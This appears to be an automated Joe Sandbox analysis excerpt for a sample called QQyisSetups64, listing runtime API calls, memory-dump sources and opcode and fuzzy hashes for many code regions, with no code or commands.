                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 955811338-0
                                                                                                                                                                                                                      • Opcode ID: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
                                                                                                                                                                                                                      • Instruction ID: 9943beb49d7de12986d85a5566eeb5b0f43708b323d605353cc103c3f820b871
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A11E936104716BFE728EFA49C41D9B7798DF44274724002EF9158E2D1DBB1D41287B9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03782C3F
                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03782C55
                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 03782C64
                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 03782C6A
                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03782C78
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2015114452-0
                                                                                                                                                                                                                      • Opcode ID: c2356193d3885a7a3f0c861346f9912c3ef419d87846fa29784de7ea9bac0bd5
                                                                                                                                                                                                                      • Instruction ID: 6af39c8fe686a6141ea15deb7e1067be092aa0dbdd286d5f5058b2ee2bebf61e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2356193d3885a7a3f0c861346f9912c3ef419d87846fa29784de7ea9bac0bd5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D801A972A9430DB6E710F7D49C81FFA77ECAB44B11F504915FB00EA0C6DAA5E80187B9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02C82BFF
                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02C82C15
                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02C82C24
                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02C82C2A
                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02C82C38
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2015114452-0
                                                                                                                                                                                                                      • Opcode ID: 9a85831669008e95302f3c5a4109ce4b296db0e8139c92389a1c5242f6d5603f
                                                                                                                                                                                                                      • Instruction ID: 3dd7ae45e748f5b424b52ae22d26af1b249b8978a464b35c473e0200e71af6da
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a85831669008e95302f3c5a4109ce4b296db0e8139c92389a1c5242f6d5603f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C001CD72E8030976F620AAA59C55FBB73ACEB44B54F508A15FF05EA0C4DBB0E5018BB5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 028936A2
                                                                                                                                                                                                                        • Part of subcall function 02893232: __getptd.LIBCMT ref: 02893240
                                                                                                                                                                                                                        • Part of subcall function 02893232: __getptd.LIBCMT ref: 0289324E
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 028936AC
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 028936BA
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 028936C8
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 028936D3
                                                                                                                                                                                                                        • Part of subcall function 028932D7: __CallSettingFrame@12.LIBCMT ref: 02893323
                                                                                                                                                                                                                        • Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937AF
                                                                                                                                                                                                                        • Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937BD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3282538202-0
                                                                                                                                                                                                                      • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                                                                      • Instruction ID: 9f562da0054c9847d26542a1764dca9d0c54cea5de4b13d1e3d32c1b15944322
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4011C6B9C00209DFDF00EFA8C944AAD7BB1FF08314F1484A9E814EB250EB39AA559F51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03784B83
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03784B8D
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03784BA0
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03784BA3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                      • Opcode ID: 3706e33754e007b0218aa734aa3f402d3688f7d551875a93d455183aa4b69d76
                                                                                                                                                                                                                      • Instruction ID: 42f1aea25a11b9acd3babc56bd1753a3370345fc51e83a161fa580dca5477d0a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3706e33754e007b0218aa734aa3f402d3688f7d551875a93d455183aa4b69d76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02018F762046148BD720FB2AFCC4B5BB7E8EBC8324F064869E50683244C778E846CB60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B63
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B6D
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B80
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B83
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                      • Opcode ID: b630166256608978c20d8252a043f865f455cdec79fd7366b11ac7fca79d7b8b
                                                                                                                                                                                                                      • Instruction ID: 0319caaaaac47e6ae930d255e26c021955ed4a229b39bea00a11d4af6fdfa4ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b630166256608978c20d8252a043f865f455cdec79fd7366b11ac7fca79d7b8b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 590167769006549FD721EB35FCC8B6BB7E8EB88358F054929E14683500C774F8458AE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 0361FF95
                                                                                                                                                                                                                        • Part of subcall function 0361FA76: __getptd.LIBCMT ref: 0361FA84
                                                                                                                                                                                                                        • Part of subcall function 0361FA76: __getptd.LIBCMT ref: 0361FA92
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0361FF9F
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0361FFAD
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0361FFBB
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0361FFC6
                                                                                                                                                                                                                        • Part of subcall function 0361FB1B: __CallSettingFrame@12.LIBCMT ref: 0361FB67
                                                                                                                                                                                                                        • Part of subcall function 03620093: __getptd.LIBCMT ref: 036200A2
                                                                                                                                                                                                                        • Part of subcall function 03620093: __getptd.LIBCMT ref: 036200B0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3282538202-0
                                                                                                                                                                                                                      • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                                                                      • Instruction ID: ba43b04fcc54c452282ce60af23b23f25211e8348a9cad900306425b7afc6b9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C11F6B9D00309DFDB00EFA4D844AADBBB0FF08310F24C169E815AB350DB799A259F54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0288E122
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0288E139
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0288E147
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0288E157
                                                                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0288E16B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                                                                      • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                                                                      • Instruction ID: 4717e109d3f11feb32530f71abb78b45ea0e8e3c9212be7baaea68f5f105e8a4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33F0B43EA44614DBDB29FBBC980177D32A2AF04729F144109F554EB3D1DB34A440DE5B
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 03795012
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 03795029
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 03795037
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 03795047
                                                                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0379505B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                                                                      • Opcode ID: b2eb4264dd65eb241df41ec9e2297f00bac74bc6cdad1047cc1de90978d538bb
                                                                                                                                                                                                                      • Instruction ID: acd2f87bdf2bae4c3c18119d9568c27d5f78d45577ef071b4a708aea9d43a852
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2eb4264dd65eb241df41ec9e2297f00bac74bc6cdad1047cc1de90978d538bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89F0F63A904714EEFE61FB7C740975D73E05F45B20F15430BD5146F2C0CB3844028A96
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C8E14B
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C8E162
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02C8E170
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 02C8E180
                                                                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 02C8E194
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                                                                      • Opcode ID: 5f50bbe14d7aaa350399b9fee5817d615b66b404789b044b83d061bccfd6d6d1
                                                                                                                                                                                                                      • Instruction ID: a7bff18bb0de7bc29e858eed6970bae421d638dac670287596712102daacba16
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f50bbe14d7aaa350399b9fee5817d615b66b404789b044b83d061bccfd6d6d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5F090329446149BE729BBB99C0577933A26F00B2CF14C219E455672C5CF745600EE55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 036149D1
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 036149E8
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 036149F6
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 03614A06
                                                                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 03614A1A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                                                                      • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                                                                      • Instruction ID: b8310010607c32122f861804d9abe383fa781b986ff8f8483c5a91c49fd48c67
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05F0B43A905310DEE762FB69980174D77F0AF00720F2D824DE515AF3D0CF644961CA5D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0378C932
                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 0378C938
                                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 0378C947
                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0378C96F
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0378C977
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3421218197-0
                                                                                                                                                                                                                      • Opcode ID: 34f1de98e40111884da17622ab36a7127ac70f51772f3de7dd7f5ce3173bd5dc
                                                                                                                                                                                                                      • Instruction ID: e04796cafbb9bbe076fc2145eb116d0c31fd780705f52240fa457f0a029798f4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34f1de98e40111884da17622ab36a7127ac70f51772f3de7dd7f5ce3173bd5dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CF0907168431CBBEB20ABA0DC4DFEB7778FB44B00F104694F719A60C5DA746A44CB54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037875D2
                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 037875D8
                                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 037875E7
                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0378760F
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 03787617
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3421218197-0
                                                                                                                                                                                                                      • Opcode ID: 2f428a3dbc220ef45ebb06cb1a69228045c0777fc810b335c9ec665176f0e083
                                                                                                                                                                                                                      • Instruction ID: 01b099f6a05436d504047686bdc049aa483de80ae53ac3578d2e060e2e7db41e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f428a3dbc220ef45ebb06cb1a69228045c0777fc810b335c9ec665176f0e083
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF0547168431DBBE720ABA4DC4DFDA7778EB44B00F208694F719A60C5D6746A44CF54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03791CD0: _doexit.LIBCMT ref: 03791CDC
                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0378F9CA
                                                                                                                                                                                                                        • Part of subcall function 03793CA0: TlsGetValue.KERNEL32(00000000,03793DF9,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000), ref: 03793CA9
                                                                                                                                                                                                                        • Part of subcall function 03793CA0: DecodePointer.KERNEL32(?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06,0000000D), ref: 03793CBB
                                                                                                                                                                                                                        • Part of subcall function 03793CA0: TlsSetValue.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793CCA
                                                                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0378F9D5
                                                                                                                                                                                                                        • Part of subcall function 03793C80: TlsGetValue.KERNEL32(?,?,0378F9DA,00000000), ref: 03793C8E
                                                                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 0378F9E8
                                                                                                                                                                                                                        • Part of subcall function 03793CD4: DecodePointer.KERNEL32(?,?,?,0378F9ED,00000000,?,00000000), ref: 03793CE5
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 0378F9F1
                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0378F9F8
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0378F9FE
                                                                                                                                                                                                                      • __freefls@4.LIBCMT ref: 0378FA1E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 781180411-0
                                                                                                                                                                                                                      • Opcode ID: 09695efacde22c3edadd9cd51127fcf6b23988413ffbadecc371c3689543cc8f
                                                                                                                                                                                                                      • Instruction ID: ee3a4f155f0d646e3ea533fb72aa0c7f5af9a40c923c3cc0ec8d9e5d60f6fa19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09695efacde22c3edadd9cd51127fcf6b23988413ffbadecc371c3689543cc8f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE04F3DA40B1977FF00B7B1BD0C88F3B9C9D42191B150901EE14DB080EA28951187A2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 02C882F0: _doexit.LIBCMT ref: 02C882FC
                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C871BC
                                                                                                                                                                                                                        • Part of subcall function 02C89754: TlsGetValue.KERNEL32(00000000,02C898AD,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000), ref: 02C8975D
                                                                                                                                                                                                                        • Part of subcall function 02C89754: DecodePointer.KERNEL32(?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA,0000000D), ref: 02C8976F
                                                                                                                                                                                                                        • Part of subcall function 02C89754: TlsSetValue.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C8977E
                                                                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 02C871C7
                                                                                                                                                                                                                        • Part of subcall function 02C89734: TlsGetValue.KERNEL32(?,?,02C871CC,00000000), ref: 02C89742
                                                                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 02C871DA
                                                                                                                                                                                                                        • Part of subcall function 02C89788: DecodePointer.KERNEL32(?,?,?,02C871DF,00000000,?,00000000), ref: 02C89799
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C871E3
                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C871EA
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C871F0
                                                                                                                                                                                                                      • __freefls@4.LIBCMT ref: 02C87210
